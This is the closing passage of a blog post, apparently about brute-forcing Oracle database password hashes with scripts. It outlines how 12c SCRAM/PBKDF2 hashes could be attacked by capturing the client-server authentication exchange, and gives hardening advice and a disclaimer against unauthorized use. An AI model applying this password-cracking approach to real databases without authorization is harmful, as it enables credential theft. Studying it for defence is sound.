Finally, I didn’t write anything about the 12c hash (SHA512) because it’s a bit more complicated. Oracle 12c used a SCRAM authentication dialog, so first, you have to listen to the client/server network dialog, get some authentication keys and then run your own script. More, the 12c hash generation process uses PBKDF2 key derivation function that is a de-optimized function. As a consequence, it will slow down the execution rate of your script. So if you want to secure your 12c authentication process and avoid password brute force, you have to use only a 12c hash password (in your password file and into USER$ table), encrypt your network dialog with AES192 algorithm (starting with 12c, it can be done even in Standard Edition), use non weak passwords.

I will terminate this blog post with the traditional disclaimer … use all that is written in this blog post (including scripts) at your own risk. If you use all this stuff to hack a SYS password without any authorization … you will be the only responsible for all the consequences ! 😉

11g, 12c, Development, Oracle, Python, security, tools

Newer posts